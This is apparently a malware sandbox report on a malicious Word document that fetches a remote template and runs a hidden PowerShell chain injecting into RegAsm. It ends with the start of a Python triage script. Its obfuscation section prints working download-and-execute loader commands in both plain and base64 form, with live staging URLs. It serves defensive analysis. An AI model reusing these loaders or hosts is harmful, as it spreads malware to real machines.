                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000C.00000002.407100012.0000000000789000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Scan Order and Specification 01-10- 2024.docx Initial sample: OLE summary lastprinted = 2024-07-15 15:30:47
                Source: Scan Order and Specification 01-10- 2024.docx Initial sample: OLE indicators vbamacros = False

                Data Obfuscation

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))"
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress 13_2_0041CBE1
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 8_2_00548F51 push eax; retf 8_2_00548F61
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 8_2_00544940 push 80000000h; iretd 8_2_00544948
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 8_2_00555B15 push ss; retf 8_2_00555B16
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 8_2_00540003 push 80000000h; iretd 8_2_00540008
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 8_2_0053FFDB push 80000000h; retf 0000h 8_2_0053FFE0
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 8_2_005401F4 push eax; retf 8_2_005401F5
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 8_2_005567BF push esi; ret 8_2_005567EB
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 8_2_005456A4 pushad ; retn 0054h 8_2_005456A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00457186 push ecx; ret 13_2_00457199
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0045E55D push esi; ret 13_2_0045E566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00457AA8 push eax; ret 13_2_00457AC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00434EB6 push ecx; ret 13_2_00434EC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_10002806 push ecx; ret 13_2_10002819
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0044693D push ecx; ret 15_2_0044694D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00451D54 push eax; ret 15_2_00451D61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_00451D34 push eax; ret 16_2_00451D41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_00444E71 push ecx; ret 16_2_00444E81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00414060 push eax; ret 17_2_00414074
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00414060 push eax; ret 17_2_0041409C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00414039 push ecx; ret 17_2_00414049
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004164EB push 0000006Ah; retf 17_2_004165C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00416553 push 0000006Ah; retf 17_2_004165C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00416555 push 0000006Ah; retf 17_2_004165C4

                Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: \Device\RdpDr\;:1\og1.in@SSL\DavWWWRoot (2 identical entries collapsed)
                Source: settings.xml.rels | Extracted files from sample: https://og1.in/9aubsm
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File dump: creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].doc.0.dr
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File dump: F971B2FE.doc.0.dr
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Section loaded: netapi32.dll and davhlpr.dll loaded
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00406EEB ShellExecuteW,URLDownloadToFileW 13_2_00406EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle 13_2_0041AADB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress 13_2_0041CBE1
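The WINWORD.EXE entries above are the entry point of the chain: the document's settings.xml.rels carries an attachedTemplate relationship whose target is https://og1.in/9aubsm, so Word fetches the template on open, over WebDAV when plain HTTPS is refused, which is what the \Device\RdpDr\;:1\og1.in@SSL\DavWWWRoot open and the davhlpr.dll load are. That relationship is visible without running the file. The following Python is an added example, not part of the Joe Sandbox report: build_sample_docx reconstructs a minimal .docx in memory from the two facts the report gives (the part name and the target URL); the surrounding XML is constructed here and does not claim to match the real sample byte for byte. The relationship namespace and the attachedTemplate type URI are the standard OOXML values.

```python
"""Static triage of the remote-template entry point shown above.

Added example; not part of the Joe Sandbox report. The .docx is rebuilt in
memory from what the report states (a settings.xml.rels relationship whose
target is https://og1.in/9aubsm); the XML around it is constructed here.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

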